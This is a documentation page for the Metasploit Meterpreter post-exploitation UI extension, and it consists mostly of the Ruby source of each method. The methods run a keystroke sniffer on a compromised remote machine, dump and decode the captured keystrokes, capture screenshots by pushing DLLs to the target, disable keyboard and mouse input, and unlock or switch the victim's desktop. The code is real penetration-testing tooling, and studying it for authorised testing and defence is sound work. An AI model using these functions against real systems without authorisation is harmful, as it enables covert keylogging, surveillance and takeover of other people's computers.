Class: Rex::Post::Meterpreter::Extensions::Stdapi::UI

Inherits:
UI
  • Object
show all
Includes:
ObjectAliasesContainer
Defined in:
lib/rex/post/meterpreter/extensions/stdapi/ui.rb

Overview

Allows for interacting with the user interface on the remote machine, such as by disabling the keyboard and mouse.

WARNING:

Using keyboard and mouse enabling/disabling features will result in a DLL file being written to disk.

Instance Attribute Summary

Attributes included from ObjectAliasesContainer

#aliases

Instance Method Summary collapse

Methods included from ObjectAliasesContainer

#dump_alias_tree, #initialize_aliases, #method_missing

Constructor Details

#initialize(client) ⇒ UI

Initializes the post-exploitation user-interface manipulation subsystem.



35
36
37
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 35

def initialize(client)
  self.client = client
end

Dynamic Method Handling

This class handles dynamic methods through the method_missing method in the class Rex::Post::Meterpreter::ObjectAliasesContainer

Instance Method Details

#disable_keyboardObject

Disable keyboard input on the remote machine.



48
49
50
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 48

def disable_keyboard
  return enable_keyboard(false)
end

#disable_mouseObject

Disable mouse input on the remote machine.



68
69
70
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 68

def disable_mouse
  return enable_mouse(false)
end

#enable_keyboard(enable = true) ⇒ Object

Enable keyboard input on the remote machine.



55
56
57
58
59
60
61
62
63
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 55

def enable_keyboard(enable = true)
  request = Packet.create_request('stdapi_ui_enable_keyboard')

  request.add_tlv(TLV_TYPE_BOOL, enable)

  response = client.send_request(request)

  return true
end

#enable_mouse(enable = true) ⇒ Object

Enable mouse input on the remote machine.



75
76
77
78
79
80
81
82
83
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 75

def enable_mouse(enable = true)
  request = Packet.create_request('stdapi_ui_enable_mouse')

  request.add_tlv(TLV_TYPE_BOOL, enable)

  response = client.send_request(request)

  return true
end

#enum_desktopsObject

Enumerate desktops.



100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 100

def enum_desktops
  request  = Packet.create_request('stdapi_ui_desktop_enum')
  response = client.send_request(request)
  desktopz = []
  if( response.result == 0 )
    response.each( TLV_TYPE_DESKTOP ) { | desktop |
    desktopz << {
        'session' => desktop.get_tlv_value( TLV_TYPE_DESKTOP_SESSION ),
        'station' => desktop.get_tlv_value( TLV_TYPE_DESKTOP_STATION ),
        'name'    => desktop.get_tlv_value( TLV_TYPE_DESKTOP_NAME )
      }
    }
  end
  return desktopz
end

#get_desktopObject

Get the current desktop meterpreter is using.



119
120
121
122
123
124
125
126
127
128
129
130
131
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 119

def get_desktop
  request  = Packet.create_request( 'stdapi_ui_desktop_get' )
  response = client.send_request( request )
  desktop  = {}
  if( response.result == 0 )
    desktop = {
        'session' => response.get_tlv_value( TLV_TYPE_DESKTOP_SESSION ),
        'station' => response.get_tlv_value( TLV_TYPE_DESKTOP_STATION ),
        'name'    => response.get_tlv_value( TLV_TYPE_DESKTOP_NAME )
      }
  end
  return desktop
end

#idle_timeObject

Returns the number of seconds the remote machine has been idle from user input.



89
90
91
92
93
94
95
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 89

def idle_time
  request = Packet.create_request('stdapi_ui_get_idle_time')

  response = client.send_request(request)

  return response.get_tlv_value(TLV_TYPE_IDLE_TIME);
end

#keyscan_dumpObject

Dump the keystroke buffer



228
229
230
231
232
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 228

def keyscan_dump
  request  = Packet.create_request('stdapi_ui_get_keys')
  response = client.send_request(request)
  return response.get_tlv_value(TLV_TYPE_KEYS_DUMP);
end

#keyscan_extract(buffer_data) ⇒ Object

Extract the keystroke from the buffer data



237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 237

def keyscan_extract(buffer_data)
  outp = ""
  buffer_data.unpack("n*").each do |inp|
    fl = (inp & 0xff00) >> 8
    vk = (inp & 0xff)
    kc = VirtualKeyCodes[vk]

    f_shift = fl & (1<<1)
    f_ctrl  = fl & (1<<2)
    f_alt   = fl & (1<<3)

    if(kc)
      name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])
      case name
      when /^.$/
        outp << name
      when /shift|click/i
      when 'Space'
        outp << " "
      else
        outp << " <#{name}> "
      end
    else
      outp << " <0x%.2x> " % vk
    end
  end
  return outp
end

#keyscan_startObject

Start the keyboard sniffer



210
211
212
213
214
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 210

def keyscan_start
  request  = Packet.create_request('stdapi_ui_start_keyscan')
  response = client.send_request(request)
  return true
end

#keyscan_stopObject

Stop the keyboard sniffer



219
220
221
222
223
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 219

def keyscan_stop
  request  = Packet.create_request('stdapi_ui_stop_keyscan')
  response = client.send_request(request)
  return true
end

#screenshot(quality = 50) ⇒ Object

Grab a screenshot of the interactive desktop



154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 154

def screenshot( quality=50 )
  request = Packet.create_request( 'stdapi_ui_desktop_screenshot' )
  request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality )

  # include the x64 screenshot dll if the host OS is x64
  if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
    screenshot_path = MetasploitPayloads.meterpreter_path('screenshot','x64.dll')
    if screenshot_path.nil?
      raise RuntimeError, "screenshot.x64.dll not found", caller
    end

    screenshot_dll  = ''
    ::File.open( screenshot_path, 'rb' ) do |f|
      screenshot_dll += f.read( f.stat.size )
    end

    request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER, screenshot_dll, false, true )
    request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
  end

  # but always include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
  screenshot_path = MetasploitPayloads.meterpreter_path('screenshot','x86.dll')
  if screenshot_path.nil?
    raise RuntimeError, "screenshot.x86.dll not found", caller
  end

  screenshot_dll  = ''
  ::File.open( screenshot_path, 'rb' ) do |f|
    screenshot_dll += f.read( f.stat.size )
  end

  request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER, screenshot_dll, false, true )
  request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH, screenshot_dll.length )

  # send the request and return the jpeg image if successfull.
  response = client.send_request( request )
  if( response.result == 0 )
    return response.get_tlv_value( TLV_TYPE_DESKTOP_SCREENSHOT )
  end

  return nil
end

#set_desktop(session = -1,, station = 'WinSta0', name = 'Default', switch = false) ⇒ Object

Change the meterpreters current desktop. The switch param sets this new desktop as the interactive one (The local users visible desktop with screen/keyboard/mouse control).



138
139
140
141
142
143
144
145
146
147
148
149
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 138

def set_desktop( session=-1, station='WinSta0', name='Default', switch=false )
  request  = Packet.create_request( 'stdapi_ui_desktop_set' )
  request.add_tlv( TLV_TYPE_DESKTOP_SESSION, session )
  request.add_tlv( TLV_TYPE_DESKTOP_STATION, station )
  request.add_tlv( TLV_TYPE_DESKTOP_NAME, name )
  request.add_tlv( TLV_TYPE_DESKTOP_SWITCH, switch )
  response = client.send_request( request )
  if( response.result == 0 )
    return true
  end
  return false
end

#unlock_desktop(unlock = true) ⇒ Object

Unlock or lock the desktop



200
201
202
203
204
205
# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 200

def unlock_desktop(unlock=true)
  request  = Packet.create_request('stdapi_ui_unlock_desktop')
  request.add_tlv(TLV_TYPE_BOOL, unlock)
  response = client.send_request(request)
  return true
end